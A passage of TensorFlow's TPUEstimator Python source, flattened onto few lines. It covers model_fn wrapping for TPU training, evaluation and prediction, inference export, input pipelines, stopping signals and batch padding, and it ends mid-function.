' 'Please adjust TPURunconfig.per_host_input_for_training.') if eval_batch_size is not None: util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size') if predict_batch_size is not None: util_lib.check_positive_integer(predict_batch_size, 'predict_batch_size') # Verifies the model_fn signature according to Estimator framework. estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access # We cannot store config and params in this constructor as parent # constructor might change them, such as assigning a temp dir for # config.model_dir. model_function = self._augment_model_fn(model_fn, batch_axis) # Overwrite log_step_count_steps to disable TensorLoggingHook and # StepCounterHook from being created in Estimator. TPUEstimator already # added equivalent hooks in _augment_model_fn above. self._log_every_n_steps = config.log_step_count_steps config = config.replace(log_step_count_steps=None) # Passing non-None params as wrapped model_fn has it. params = params or {} super(TPUEstimator, self).__init__( model_fn=model_function, model_dir=model_dir, config=config, params=params, warm_start_from=warm_start_from) self._iterations_per_training_loop = ( self._config.tpu_config.iterations_per_loop) # All properties passed to _InternalTPUContext are immutable. # pylint: disable=protected-access self._ctx = tpu_context._get_tpu_context( self._config, train_batch_size, eval_batch_size, predict_batch_size, use_tpu, eval_on_tpu) self._export_to_tpu = export_to_tpu self._is_input_fn_invoked = None def _add_meta_graph_for_mode(self, builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables=True, mode=model_fn_lib.ModeKeys.PREDICT, export_tags=None, check_variables=True): if mode != model_fn_lib.ModeKeys.PREDICT: raise NotImplementedError( 'TPUEstimator only handles mode PREDICT for export_savedmodel(); ' 'got {}.'.format(mode)) (super(TPUEstimator, self). _add_meta_graph_for_mode(builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables, mode=mode, export_tags=export_tags, check_variables=check_variables)) if self._export_to_tpu: input_receiver_fn_map = {_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]} export_tags = [tag_constants.SERVING, tag_constants.TPU] mode = _REWRITE_FOR_INFERENCE_MODE # See b/110052256 for why `check_variables` is `False`. (super(TPUEstimator, self). _add_meta_graph_for_mode(builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables=False, mode=mode, export_tags=export_tags, check_variables=False)) def _call_model_fn(self, features, labels, mode, config): if mode == _REWRITE_FOR_INFERENCE_MODE: return self._call_model_fn_for_inference(features, labels, mode, config) else: return super(TPUEstimator, self)._call_model_fn( features, labels, mode, config) def _call_model_fn_for_inference(self, features, labels, mode, config): """Wraps `_call_model_fn` for `export_savedmodel`.""" if mode != _REWRITE_FOR_INFERENCE_MODE: raise ValueError('mode must be {}; ' 'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode)) capture = _CapturedObject() def computation(): """Compute tpu tensors used in export_outputs. Passed to rewrite_for_inference so that model_fn will be called under the rewriting contexts. Only tpu tensors are returned, but export_outputs and scaffold are captured. Returns: A list of Tensors used in export_outputs and not marked for outside_compilation. 
""" # We should only call model fn once and it should be inside `computation` # so that building the graph will happen under `rewrite_for_inference`. mode = model_fn_lib.ModeKeys.PREDICT estimator_spec = self._call_model_fn(features, labels, mode, config) # We pick the TPU tensors out from `export_output` and later return them # from `computation` for rewriting. tensors_dict = collections.OrderedDict( (k, _export_output_to_tensors(v)) for k, v in six.iteritems(estimator_spec.export_outputs) ) tensors = nest.flatten(tensors_dict) tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)] # We cannot return anything other than `tpu_tensors` here so we capture # the rest for later use. capture.capture((estimator_spec, tensors_dict, tensors)) return tpu_tensors tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation) estimator_spec, tensors_dict, tensors = capture.get() # Reconstruct `tensors`, but with `tpu_tensors` replaced with # `tpu_tensors_on_cpu`. new_tensors = [] for t in tensors: if _is_tpu_tensor(t): new_tensors.append(tpu_tensors_on_cpu.pop(0)) elif t is None: new_tensors.append(None) else: # Only fetching `tpu_tensors_on_cpu` does not trigger # TPU computation and blocks, so we add the control dependency here. control_inputs = (tpu_tensors_on_cpu if isinstance(tpu_tensors_on_cpu, (list, tuple)) else (tpu_tensors_on_cpu,)) with ops.control_dependencies(control_inputs): new_tensors.append(array_ops.identity(t)) # Reconstruct `tensors_dict`. new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors) # Reconstruct `export_outputs`. export_outputs = estimator_spec.export_outputs new_export_outputs = collections.OrderedDict( (k, _clone_export_output_with_tensors(export_outputs[k], v)) for k, v in six.iteritems(new_tensors_dict) ) return estimator_spec._replace(export_outputs=new_export_outputs) def _create_global_step(self, graph): """Creates a global step suitable for TPUs. Args: graph: The graph in which to create the global step. Returns: A global step `Tensor`. Raises: ValueError: if the global step tensor is already defined. """ return _create_global_step(graph) def _convert_train_steps_to_hooks(self, steps, max_steps): with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx: if ctx.is_running_on_cpu(): return super(TPUEstimator, self)._convert_train_steps_to_hooks( steps, max_steps) # On TPU. if steps is None and max_steps is None: raise ValueError( 'For TPU training, one of `steps` or `max_steps` must be set. ' 'Cannot be both `None`.') # Estimator.train has explicit positiveness check. if steps is not None: util_lib.check_positive_integer(steps, 'Train steps') if max_steps is not None: util_lib.check_positive_integer(max_steps, 'Train max_steps') return [ _TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps) ] def _convert_eval_steps_to_hooks(self, steps): with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx: if ctx.is_running_on_cpu(): return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps) if steps is None: raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.') util_lib.check_positive_integer(steps, 'Eval steps') return [ evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access num_evals=steps), _SetEvalIterationsHook(steps) ] def _call_input_fn(self, input_fn, mode): """Calls the input function. Args: input_fn: The input function. mode: ModeKeys Returns: Either features or (features, labels) where features and labels are: features - `Tensor` or dictionary of string feature name to `Tensor`. 
labels - `Tensor` or dictionary of `Tensor` with labels. Raises: ValueError: if input_fn takes invalid arguments or does not have `params`. """ input_fn_args = function_utils.fn_args(input_fn) config = self.config # a deep copy. kwargs = {} if 'params' in input_fn_args: kwargs['params'] = self.params # a deep copy. else: raise ValueError('input_fn ({}) does not include params argument, ' 'required by TPUEstimator to pass batch size as ' 'params["batch_size"]'.format(input_fn)) if 'config' in input_fn_args: kwargs['config'] = config if 'mode' in input_fn_args: kwargs['mode'] = mode # Records the fact input_fn has been invoked. self._is_input_fn_invoked = True with self._ctx.with_mode(mode) as ctx: # Setting the batch size in params first. This helps user to have same # input_fn for use_tpu=True/False. batch_size_for_input_fn = ctx.batch_size_for_input_fn if batch_size_for_input_fn is not None: _add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY, batch_size_for_input_fn) # For export_savedmodel, input_fn is never passed to Estimator. So, # `is_export_mode` must be False. if ctx.is_running_on_cpu(is_export_mode=False): with ops.device('/device:CPU:0'): return input_fn(**kwargs) # For TPU computation, input_fn should be invoked in a tf.while_loop for # performance. While constructing the tf.while_loop, the structure of # inputs returned by the `input_fn` needs to be recorded. The structure # includes whether features or labels is dict or single Tensor, dict keys, # tensor shapes, and dtypes. The recorded structure is used to create the # infeed dequeue ops, which must be wrapped and passed as a Fn, called # inside the TPU computation, as the TPU computation is wrapped inside a # tf.while_loop also. So, we either pass input_fn to model_fn or pass # dequeue_fn to model_fn. Here, `input_fn` is passed directly as # `features` in `model_fn` signature. def _input_fn(ctx): _add_item_to_params(kwargs['params'], _CTX_KEY, ctx) return input_fn(**kwargs) return _input_fn def _validate_features_in_predict_input(self, result): """Skip the validation. For TPUEstimator, we do not need to check the result type. `_InputPipeline` has stronger check. Parent class's check generates confusing warning msg. Args: result: `features` returned by input_fn. """ pass def _augment_model_fn(self, model_fn, batch_axis): """Returns a new model_fn, which wraps the TPU support.""" def _model_fn(features, labels, mode, config, params): """A Estimator `model_fn` for TPUEstimator.""" with self._ctx.with_mode(mode) as ctx: model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx) if mode != model_fn_lib.ModeKeys.PREDICT: is_export_mode = False else: # For export_savedmodel, input_fn is never passed to Estimator. So, by # checking the self._is_input_fn_invoked bit, we can know, given the # mode == PREDICT, it is the .predict API, not export_savedmodel API. if self._is_input_fn_invoked: is_export_mode = False else: is_export_mode = True # Clear the bit. self._is_input_fn_invoked = None if ctx.is_running_on_cpu(is_export_mode=is_export_mode): logging.info('Running %s on CPU', mode) return model_fn_wrapper.call_without_tpu( features, labels, is_export_mode=is_export_mode) assert labels is None, '`labels` passed to `model_fn` must be `None`.' # TPUEstimator._call_input_fn passes `input_fn` as features to here. assert callable(features), '`input_fn` is not callable.' 
input_fn = features input_holders = _InputPipeline(input_fn, batch_axis, ctx) enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = ( input_holders.generate_infeed_enqueue_ops_and_dequeue_fn()) graph = ops.get_default_graph() for enqueue_op in enqueue_ops: if isinstance(enqueue_op, list): graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op) else: graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op) if mode == model_fn_lib.ModeKeys.TRAIN: loss, host_call, scaffold = ( _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn)) host_ops = host_call.create_tpu_hostcall() if host_ops is None: host_ops = [] shutdown_hooks = [] shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE', 'shutdown_worker') if shutdown_mode: if shutdown_mode == 'shutdown_worker': finalizer_hooks = [ session_support.ShutdownLameWorkers(timeout_ms=60*1000), ] elif shutdown_mode == 'shutdown_computation': finalizer_hooks = [ session_support.RestartComputation(timeout_ms=60*1000), ] else: raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode) shutdown_hooks.append(session_support.GracefulShutdownHook( checkpoint_prefix=self.model_dir + '/model.ckpt', on_shutdown_hooks=finalizer_hooks )) with ops.control_dependencies([loss]): global_step = array_ops.identity(training.get_global_step()) hooks = input_hooks + shutdown_hooks logging_hook_frequency = ( # Divide and round up (self._log_every_n_steps + self._config.tpu_config.iterations_per_loop - 1) // self._config.tpu_config.iterations_per_loop) hooks.extend([ TPUInfeedOutfeedSessionHook( ctx, enqueue_ops, host_ops, run_infeed_loop_on_coordinator=( run_infeed_loop_on_coordinator)), InstallSignalHandlerHook(), training.LoggingTensorHook( { 'loss': array_ops.identity(loss), 'step': global_step, }, every_n_iter=logging_hook_frequency) ]) examples_hook = ExamplesPerSecondHook( ctx.global_batch_size, output_dir=self.model_dir, every_n_steps=self._log_every_n_steps) examples_hook._set_steps_per_run( # pylint: disable=protected-access self._config.tpu_config.iterations_per_loop) hooks.append(examples_hook) chief_hooks = [] if (self._config.save_checkpoints_secs or self._config.save_checkpoints_steps): checkpoint_hook = training.CheckpointSaverHook( self.model_dir, save_secs=self._config.save_checkpoints_secs, save_steps=self._config.save_checkpoints_steps, scaffold=scaffold) checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access self._config.tpu_config.iterations_per_loop) chief_hooks.append(checkpoint_hook) summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss) with ops.control_dependencies([loss]): update_ops = _sync_variables_ops() # Validate the TPU training graph to catch basic errors _validate_tpu_training_graph() train_op = control_flow_ops.group(*update_ops) graph.add_to_collection(_TPU_TRAIN_OP, train_op) return model_fn_lib.EstimatorSpec( mode, loss=loss, training_chief_hooks=chief_hooks, training_hooks=hooks, train_op=train_op, scaffold=scaffold) if mode == model_fn_lib.ModeKeys.EVAL: total_loss, host_calls, scaffold = _eval_on_tpu_system( ctx, model_fn_wrapper, dequeue_fn) iterations_per_loop_var = _create_or_get_iterations_per_loop() mean_loss = math_ops.div(total_loss, math_ops.cast( iterations_per_loop_var, dtype=total_loss.dtype)) # Creates a dummy metric update_op for all metrics. Estimator expects # all metrics in eval_metric_ops have update_op and calls them one by # one. The real metric update_ops are invoked in a separated thread. # So, here give Estimator the dummy op for all metrics. 
with ops.control_dependencies([mean_loss]): # After TPU evaluation computation is done (the mean_loss tensor), # reads all variables back from TPU and updates the eval step # counter properly internal_ops_to_run = _sync_variables_ops() internal_ops_to_run.append( _increase_eval_step_op(iterations_per_loop_var)) with ops.control_dependencies(internal_ops_to_run): dummy_update_op = control_flow_ops.no_op() host_call_ret = host_calls.create_tpu_hostcall() eval_metric_ops = {} eval_update_ops = [] for k, v in host_call_ret['eval_metrics'].items(): eval_metric_ops[k] = (v[0], dummy_update_op) eval_update_ops.append(v[1]) if 'host_call' not in host_call_ret: host_ops = [] else: host_ops = host_call_ret['host_call'] hooks = [ TPUInfeedOutfeedSessionHook( ctx, enqueue_ops, eval_update_ops + host_ops, run_infeed_loop_on_coordinator=( run_infeed_loop_on_coordinator)), ] + input_hooks return model_fn_lib.EstimatorSpec( mode, loss=mean_loss, evaluation_hooks=hooks, eval_metric_ops=eval_metric_ops, scaffold=scaffold) # Predict assert mode == model_fn_lib.ModeKeys.PREDICT dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system( ctx, model_fn_wrapper, dequeue_fn) with ops.control_dependencies([dummy_predict_op]): internal_ops_to_run = _sync_variables_ops() with ops.control_dependencies(internal_ops_to_run): dummy_predict_op = control_flow_ops.no_op() # In train and evaluation, the main TPU program is passed to monitored # training session to run. Infeed enqueue and outfeed dequeue are # executed in side threads. This is not the configuration for # prediction mode. # # For prediction, the Estimator executes the EstimatorSpec.predictions # directly and yield the element (via generator) to call site. So, the # outfeed based prediction must be passed to MonitoredSession directly. # Other parts of the TPU execution are organized as follows. # # 1. All outfeed based Tensors must be grouped with predictions Tensors # to form a single invocation. This avoid the issue we might trigger # multiple outfeeds incorrectly. To achieve this, `host_call` is # placed in control_dependencies of `stopping_signals`, and # `stopping_signals` is passed into _StoppingPredictHook, which sets # the `stopping_signals` as SessionRunArgs. MonitoredSession merges # all SessionRunArgs with the fetch in session.run together. # # 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue) # are grouped together. They will be launched once and only once in # side threads and they quit naturally according to the SAME stopping # condition. enqueue_ops.append(dummy_predict_op) host_call_ret = host_calls.create_tpu_hostcall() if 'host_call' not in host_call_ret: host_ops = [] else: host_ops = host_call_ret['host_call'] predictions = host_call_ret['predictions'] _verify_cross_hosts_transfer_size( predictions, message=( 'The estimated size for TPUEstimatorSpec.predictions is too ' 'large.')) signals = host_call_ret['signals'] with ops.control_dependencies(host_ops): host_ops = [] # Empty, we do do not need it anymore. 
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal( signals) predictions = _PaddingSignals.slice_tensor_or_dict( predictions, signals) hooks = [ _StoppingPredictHook(scalar_stopping_signal), TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops, host_ops), ] + input_hooks return model_fn_lib.EstimatorSpec( mode, prediction_hooks=hooks, predictions=predictions, scaffold=scaffold) return _model_fn def _is_tpu_tensor(tensor): if not isinstance(tensor, ops.Tensor): return False try: tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access except ValueError: return True else: return False def _export_output_to_tensors(export_output): """Get a list of `Tensors` used in `export_output`. Args: export_output: an `ExportOutput` object such as `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. Returns: a list of tensors used in export_output. Raises: ValueError: if `export_output` is not one of `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. """ if isinstance(export_output, export_output_lib.ClassificationOutput): return [export_output.scores, export_output.classes] elif isinstance(export_output, export_output_lib.RegressionOutput): return [export_output.value] elif isinstance(export_output, export_output_lib.PredictOutput): return export_output.outputs.values() else: raise ValueError( '`export_output` must be have type `ClassificationOutput`, ' '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output)) def _clone_export_output_with_tensors(export_output, tensors): """Clones `export_output` but with new `tensors`. Args: export_output: an `ExportOutput` object such as `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. tensors: a list of `Tensors` used to construct a new `export_output`. Returns: A dict similar to `export_output` but with `tensors`. Raises: ValueError: if `export_output` is not one of `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. 
""" if isinstance(export_output, export_output_lib.ClassificationOutput): if len(tensors) != 2: raise ValueError('tensors must be of length 2; ' 'got {}.'.format(len(tensors))) return export_output_lib.ClassificationOutput(*tensors) elif isinstance(export_output, export_output_lib.RegressionOutput): if len(tensors) != 1: raise ValueError('tensors must be of length 1; ' 'got {}'.format(len(tensors))) return export_output_lib.RegressionOutput(*tensors) elif isinstance(export_output, export_output_lib.PredictOutput): return export_output_lib.PredictOutput( dict(zip(export_output.outputs.keys(), tensors))) else: raise ValueError( '`export_output` must be have type `ClassificationOutput`, ' '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output)) def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" iterations_per_loop_var = _create_or_get_iterations_per_loop() single_tpu_eval_step, host_calls, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)) def multi_tpu_eval_steps_on_single_shard(): return training_loop.repeat( iterations_per_loop_var, single_tpu_eval_step, [_ZERO_LOSS]) (loss,) = tpu.shard( multi_tpu_eval_steps_on_single_shard, inputs=[], num_shards=ctx.num_replicas, outputs_from_all_shards=False, device_assignment=ctx.device_assignment) scaffold = _get_scaffold(captured_scaffold_fn) return loss, host_calls, scaffold def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" iterations_per_loop_var = _create_or_get_iterations_per_loop() single_tpu_train_step, host_call, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn)) def multi_tpu_train_steps_on_single_shard(): return training_loop.repeat( iterations_per_loop_var, single_tpu_train_step, [_INITIAL_LOSS]) (loss,) = tpu.shard( multi_tpu_train_steps_on_single_shard, inputs=[], num_shards=ctx.num_replicas, outputs_from_all_shards=False, device_assignment=ctx.device_assignment) scaffold = _get_scaffold(captured_scaffold_fn) return loss, host_call, scaffold def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" num_cores = ctx.num_cores single_tpu_predict_step, host_calls, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)) def multi_tpu_predict_steps_on_single_shard(): def cond(scalar_stopping_signal): return math_ops.logical_not( _StopSignals.should_stop(scalar_stopping_signal)) inputs = [_StopSignals.NON_STOPPING_SIGNAL] outputs = training_loop.while_loop( cond, single_tpu_predict_step, inputs=inputs, name=b'loop') return outputs (dummy_predict_op,) = tpu.shard( multi_tpu_predict_steps_on_single_shard, inputs=[], num_shards=num_cores, outputs_from_all_shards=False) scaffold = _get_scaffold(captured_scaffold_fn) return dummy_predict_op, host_calls, scaffold def _wrap_computation_in_while_loop(device, op_fn): """Wraps the ops generated by `op_fn` in tf.while_loop.""" def computation(i): with ops.control_dependencies(op_fn()): return i + 1 iterations_per_loop_var = _create_or_get_iterations_per_loop() # By setting parallel_iterations=1, the parallel execution in while_loop is # basically turned off. 
with ops.device(device): iterations = array_ops.identity(iterations_per_loop_var) return control_flow_ops.while_loop( lambda i: i < iterations, computation, [constant_op.constant(0)], parallel_iterations=1) def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn): """Wraps the ops generated by `op_fn` in tf.while_loop.""" def cond(scalar_stopping_signal): return math_ops.logical_not( _StopSignals.should_stop(scalar_stopping_signal)) def computation(unused_scalar_stopping_signal): return_value = op_fn() execute_ops = return_value['ops'] signals = return_value['signals'] with ops.control_dependencies(execute_ops): return _StopSignals.as_scalar_stopping_signal(signals) # By setting parallel_iterations=1, the parallel execution in while_loop is # basically turned off. with ops.device(device): return control_flow_ops.while_loop( cond, computation, [_StopSignals.NON_STOPPING_SIGNAL], parallel_iterations=1) def _validate_tpu_training_graph(): """Validate graph before running distributed training. Raises: ValueError: If the graph seems invalid for running on device """ operations = ops.get_default_graph().get_operations() # Check if there is atleast one CrossReplicaSum operation in the graph # This should be introduced by using the CrossShardOptimizer wrapper cross_replica_sum_ops = [ o for o in operations if o.type == _CROSS_REPLICA_SUM_OP ] if not cross_replica_sum_ops: raise ValueError( 'CrossShardOptimizer must be used for model training on TPUs.') class _CapturedObject(object): """A placeholder to capture an object. This is useful when we need to capture a Python object in the Tensorflow control flow body function and use it outside the control flow. """ def __init__(self): self._object = None self._captured = False def capture(self, o): if self._captured: raise RuntimeError( 'InternalError: Object can capture only once. Please file bug.') self._captured = True self._object = o def get(self): if not self._captured: raise RuntimeError( 'InternalError: Object is not captured properly before `get`. 
' 'Please file bug.') return self._object def _get_scaffold(captured_scaffold_fn): """Retrieves the Scaffold from `captured_scaffold_fn`.""" with _CapturingContext(message='Inside scaffold_fn'): scaffold_fn = captured_scaffold_fn.get() if scaffold_fn: scaffold = scaffold_fn() if scaffold is None: raise ValueError( 'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed') else: scaffold = None if scaffold: wrapped_finalize = scaffold.finalize def _finalize(): with _CapturingContext('Inside Scaffold.finalize'): wrapped_finalize() scaffold.finalize = _finalize return scaffold class _CapturingContext(control_flow_ops.ControlFlowContext): """Tracks references to Tensors defined in TPU replication.""" def __init__(self, message): control_flow_ops.ControlFlowContext.__init__(self) self._message = message def AddOp(self, op): # pylint: disable=invalid-name for c in op.inputs: if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access raise ValueError('{}: Op {} depends on TPU computation {}, ' 'which is not allowed.'.format(self._message, op, c)) def __enter__(self): # pylint: disable=protected-access self._g = ops.get_default_graph() self._old = self._g._get_control_flow_context() self._g._set_control_flow_context(self) # pylint: enable=protected-access def __exit__(self, _, __, ___): # pylint: disable=invalid-name self._g._set_control_flow_context(self._old) # pylint: disable=protected-access class _Inputs(object): """A data structure representing the input_fn returned values. This also supports the returned value from input_fn as `Dataset`. """ def __init__(self, features=None, labels=None, dataset=None, signals=None): if dataset is not None and (features is not None or labels is not None or signals is not None): raise RuntimeError('Internal Error: Either (features and labels) or ' 'dataset should be provided, not both. Please file ' 'bug') self._features = features self._labels = labels self._signals = signals self._dataset = dataset self._iterator = None @staticmethod def from_input_fn(return_values): """Returns an `_Inputs` instance according to `input_fn` return value.""" if isinstance(return_values, dataset_ops.Dataset): dataset = return_values return _Inputs(dataset=dataset) features, labels = _Inputs._parse_inputs(return_values) return _Inputs(features, labels) @staticmethod def _parse_inputs(return_values): if isinstance(return_values, tuple): features, labels = return_values else: features, labels = return_values, None return features, labels @property def is_dataset(self): """Returns True if the return value from input_fn is Dataset.""" return self._dataset is not None def dataset_initializer_hook(self): """Returns a `SessionRunHook` to initialize this dataset. This must be called before `features_and_labels`. """ iterator = self._dataset.make_initializable_iterator() # pylint: disable=protected-access hook = estimator_util._DatasetInitializerHook(iterator) # pylint: enable=protected-access self._iterator = iterator return hook def features_and_labels(self): """Gets `features` and `labels`.""" if self.is_dataset: if self._iterator is None: raise RuntimeError('Internal error: Must call dataset_initializer_hook ' 'before calling features_and_labels(). 
Please file ' 'a bug!') return _Inputs._parse_inputs(self._iterator.get_next()) return (self._features, self._labels) def signals(self): return self._signals @property def dataset(self): return self._dataset class _InputsWithStoppingSignals(_Inputs): """Inputs with `_StopSignals` inserted into the dataset.""" def __init__(self, dataset, batch_size, add_padding=False): assert dataset is not None user_provided_dataset = dataset.map( _InputsWithStoppingSignals.insert_stopping_signal( stop=False, batch_size=batch_size, add_padding=add_padding)) final_batch_dataset = dataset.take(1).map( _InputsWithStoppingSignals.insert_stopping_signal( stop=True, batch_size=batch_size, add_padding=add_padding)) dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2) super(_InputsWithStoppingSignals, self).__init__(dataset=dataset) self._current_inputs = None def features_and_labels(self): if self._current_inputs is not None: raise RuntimeError( 'Internal Error: The previous inputs have not been properly ' 'consumed. First call features_and_labels, then call signals.') inputs_with_signals = self._iterator.get_next() features = inputs_with_signals['features'] labels = inputs_with_signals.get('labels') self._current_inputs = inputs_with_signals return features, labels def signals(self): """Returns the `Signals` from `_Inputs`.""" if self._current_inputs is None: raise RuntimeError( 'Internal Error: The current inputs have not been properly ' 'generated. First call features_and_labels, then call signals.') signals = self._current_inputs['signals'] self._current_inputs = None return signals @staticmethod def insert_stopping_signal(stop, batch_size, add_padding=False): """Inserts stopping_signal into dataset via _map_fn. Here we change the data structure in the dataset, such that the return value is a dictionary now and `features`, `labels`, and `signals` are three distinguished keys in that dict. This provides a better structure, which eases the process to decompose the inputs (see `features_and_labels`). Args: stop: bool, state of current stopping signals. batch_size: int, batch size. add_padding: bool, whether to pad the tensor to full batch size. Returns: A map_fn passed to dataset.map API. """ def _map_fn(*args): """The map fn to insert signals.""" if len(args) == 1: # Unpack the single Tensor/dict argument as features. This is required # for the input_fn returns no labels. 
args = args[0] features, labels = _Inputs._parse_inputs(args) new_input_dict = {} if add_padding: padding_mask, features, labels = ( _PaddingSignals.pad_features_and_labels( features, labels, batch_size)) new_input_dict['features'] = features if labels is not None: new_input_dict['labels'] = labels else: new_input_dict['features'] = features if labels is not None: new_input_dict['labels'] = labels padding_mask = None new_input_dict['signals'] = _StopSignals( stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict() return new_input_dict return _map_fn class _StopSignals(object): """Signals class holding all logic to handle TPU stopping condition.""" NON_STOPPING_SIGNAL = False STOPPING_SIGNAL = True def __init__(self, stop, batch_size, padding_mask=None): self._stop = stop self._batch_size = batch_size self._padding_mask = padding_mask def as_dict(self): """Returns the signals as Python dict.""" shape = [self._batch_size, 1] dtype = dtypes.bool if self._stop: stopping = array_ops.ones(shape=shape, dtype=dtype) else: stopping = array_ops.zeros(shape=shape, dtype=dtype) signals = {'stopping': stopping} if self._padding_mask is not None: signals['padding_mask'] = self._padding_mask return signals @staticmethod def as_scalar_stopping_signal(signals): return array_ops.identity(signals['stopping'][0][0]) @staticmethod def should_stop(scalar_stopping_signal): """Detects whether scalar_stopping_signal indicates stopping.""" if isinstance(scalar_stopping_signal, ops.Tensor): # STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF # way to express the bool check whether scalar_stopping_signal is True. return math_ops.logical_and( scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL) else: # For non Tensor case, it is used in SessionRunHook. So, we cannot modify # the graph anymore. Here, we use pure Python. 
return bool(scalar_stopping_signal) class _PaddingSignals(object): """Signals class holding all logic to handle padding.""" @staticmethod def pad_features_and_labels(features, labels, batch_size): """Pads out the batch dimension of features and labels.""" real_batch_size = array_ops.shape( _PaddingSignals._find_any_tensor(features))[0] batch_size_tensor = constant_op.constant(batch_size, dtypes.int32) check_greater = check_ops.assert_greater_equal( batch_size_tensor, real_batch_size, data=(batch_size_tensor, real_batch_size), message='The real batch size should not be greater than batch_size.') with ops.control_dependencies([check_greater]): missing_count = batch_size_tensor - real_batch_size def pad_single_tensor(tensor): """Pads out the batch dimension of a tensor to the complete batch_size.""" rank = len(tensor.shape) assert rank > 0 padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1)) padded_shape = (batch_size,) + tuple(tensor.shape[1:]) padded_tensor = array_ops.pad(tensor, padding) padded_tensor.set_shape(padded_shape) return padded_tensor def nest_pad(tensor_or_dict): return nest.map_structure(pad_single_tensor, tensor_or_dict) features = nest_pad(features) if labels is not None: labels = nest_pad(labels) padding_mask = _PaddingSignals._padding_mask( real_batch_size, missing_count, batch_size) return padding_mask, features, labels @staticmethod def slice_tensor_or_dict(tensor_or_dict, signals): """Slice the real Tensors according to padding mask in signals.""" padding_mask = signals['padding_mask'] batch_size = array_ops.shape(padding_mask)[0] def verify_batch_size(tensor): check_batch_size = math_ops.equal(batch_size, tensor.shape[0]) with ops.control_dependencies([check_batch_size]): return array_ops.identity(tensor) def slice_single_tensor(tensor): rank = len(tensor.shape) assert rank > 0 real_batch_size = batch_size - math_ops.reduce_sum(padding_mask) return verify_batch_size(tensor)[0:real_batch_size] # As we split the Tensors to all TPU cores and concat them back, it is # important to ensure the real data is placed before padded ones, i.e., # order is preserved. By that, the sliced padding mask should have all 0's. # If this assertion failed, # the slice logic here would not hold. sliced_padding_mask = slice_single_tensor(padding_mask) assert_padding_mask = math_ops.equal( math_ops.reduce_sum(sliced_padding_mask), 0) with ops.control_dependencies([assert_padding_mask]): should_stop = _StopSignals.should_stop( _StopSignals.as_scalar_stopping_signal(signals)) is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0) def slice_fn(tensor): # If the current batch is full batch or part of stopping signals, we do # not need to slice to save performance. 
return control_flow_ops.cond( math_ops.logical_or(should_stop, is_full_batch), (lambda: verify_batch_size(tensor)), (lambda: slice_single_tensor(tensor))) return nest.map_structure(slice_fn, tensor_or_dict) @staticmethod def _find_any_tensor(batch_features): tensors = [x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)] if not tensors: raise ValueError('Cannot find any Tensor in features dict.') return tensors[0] @staticmethod def _padding_mask(real_batch_size, missing_count, batch_size): padding_mask = array_ops.concat( [ array_ops.zeros((real_batch_size,), dtype=dtypes.int32), array_ops.ones((missing_count,), dtype=dtypes.int32) ], axis=0) padding_mask.set_shape((batch_size,)) return padding_mask class _SignalsHelper(object): """A general helper class to handle common signals manipulation.""" def __init__(self, signals): self._signal_keys = [] for key in sorted(iter(signals.keys())): self._signal_keys.append(key) @property def num_signals(self): return len(self._signal_keys) def unflatten(self, tensor_list): return dict(zip(self._signal_keys, tensor_list)) @staticmethod def as_tensor_list(signals): return [signals[key] for key in sorted(iter(signals.keys()))] def _verify_cross_hosts_transfer_size(tensor_dict, message): total_size = 0 tensor_structure = {} for key, tensor in tensor_dict.items(): shape 